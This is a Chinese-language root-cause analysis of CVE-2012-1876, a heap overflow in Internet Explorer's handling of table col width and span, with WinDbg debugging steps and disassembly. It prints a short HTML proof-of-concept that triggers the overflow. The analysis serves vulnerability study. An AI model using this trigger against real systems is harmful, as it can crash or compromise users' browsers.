CVE-2012-1876-PoC分析
CVE-2012-1876-PoC分析
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow,
aka "Col Element Remote Code Execution Vulnerability,"
as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.
环境
Windows 7 x86 sp1
IE 8
调试分析
POC
<html><body><tablestyle="table-layout:fixed">-
<colid="132"width="41"span="1">  </col> </table><script>function over_trigger(){-
var obj_col = document.getElementById("132"); obj_col.width ="42765";obj_col.span =1000;}setTimeout("over_trigger();",1);</script></body></html>
开启页堆
gflags.exe -i iexplore.exe +hpa
加载POC,windbg并不会捕捉到异常,因为异常是在子进程中发生的,需要设置windbg支持子进程调试,开启子进程调试
.childdbg 1
加载程序运行:
向上回溯:
追溯edi来源
69700a1a8bff mov edi,edi69700a1c55 push ebp69700a1d8bec mov ebp,esp69700a1f8b08 mov ecx,dword ptr [eax]69700a2153 push ebx69700a228b5d08 mov ebx,dword ptr [ebp+8]69700a2557 push edi69700a268bc1 mov eax,ecx69700a2883e00fand eax,0Fh69700a2b8d7e18 lea edi,[esi+18h]
没有对esi处理的代码,对调用函数下断点,确保已经加载欲调试的子进程。
sxe ld:mshtml
bp mshtml!CTableLayout::CalculateMinMax
mshtml!CTableLayout::CalculateMinMax:64bfa0788bff mov edi,edi64bfa07a55 push ebp64bfa07b8bec mov ebp,esp64bfa07d81ec98000000sub esp,98h64bfa08353 push ebx64bfa0848b5d08 mov ebx,dword ptr [ebp+8] ss:0023:03e3c484=05fb2ea8
0:005> dd poi(ebp+8)05fb2ea864af9960071eef3005bfdfb864cae3b805fb2eb800000001000000000108080d ffffffff05fb2ec8000000000000000000000000 ffffffff05fb2ed8000182b80000a7f8000000000000000005fb2ee80000000000412802000000000000000005fb2ef80000000000000001 ffffffff ffffffff05fb2f08 ffffffff ffffffff 64afa5940000000405fb2f180000000406a6bff064afa594000000040:005> ln 64af9960(64af9960) mshtml!CTableLayout::'vftable'|(64af9aa0) mshtml!CTableLayoutBlock::`vftable'Exact matches:mshtml!CTableLayout::`vftable' = <no type information>
参数一this指针引用了 mshtml!CTableLayout::'vftable' 也就是 table 中的对象
继续向下向下运行
ebx+54h 引用了this指针,也就是引用了 table标签 ,值为1,span属性值的和。称其为spannum
继续向下分析:
若 spancmp >= spannum 跳转, 这里0<1 , 不跳转。
继续向下 , 分析 EnsureSizeWorker 函数, 大概就是
edi来自 CTableLayout::CalculateMinMax CTableLayout + 0x90 + dwBytes(0xc) .
上面可以看出分配了 0x70 大小的堆, CTableLayout+0x9c 指向的地址。
先总结一下:
CTableLayout::CalculateMinMax函数的第一个参数是CTableLayout对象,即table标签在内存的对象。CTableLayout+0x54span属性的值 spannum。CTableLayout+0x90对象,+c 保存申请的内存CTableLayout+0x94用于与 spannum 作比较的spancmp,当 spancmp <<2 后小于 spannum 才分配堆块。
我们也直接g , 运行向下看。
当分配完内存后,执行poc中的over_trigger函数时,会再一次断在CTableLayout::CalculateMinMax 函数中,跟进去看下spannum和spancmp的值。ebx+5x 即 spannum = 1,ebx+94 即 spancmp = 4,(4>>2)为1==1,不发生跳转,不分配内存
在 mshtml!CTableCol::GetAAspan 下断点,让它第二次获取span值的时候断下来。
第一次 GetAAspan 获取的span值为1,第二次获取 1000。
上图可以看书span最大为1000。
继续分析到 CWidthUnitValue::GetPixelWidth 得到 width*100
继续分析:
CTableColCalc::AdjustForCol 函数会向申请的内存写入 width*100 , 比如 width = 41 ,就写入 0x1004 ,每次写入0x1c大小,一共写入0x3e8次。
但是上面 EnsureSizeWorker 函数只申请了 4*0x1c = 0x70 大小的空间。导致了溢出。
参考
http://whitehatck01.blogspot.com/2018/03/cve-2012-1876-internet-explorer_17.html
http://eternalsakura13.com/2018/03/10/cve2012_1876/
http://pwdme.cc/2017/10/31/cve-2012-1876/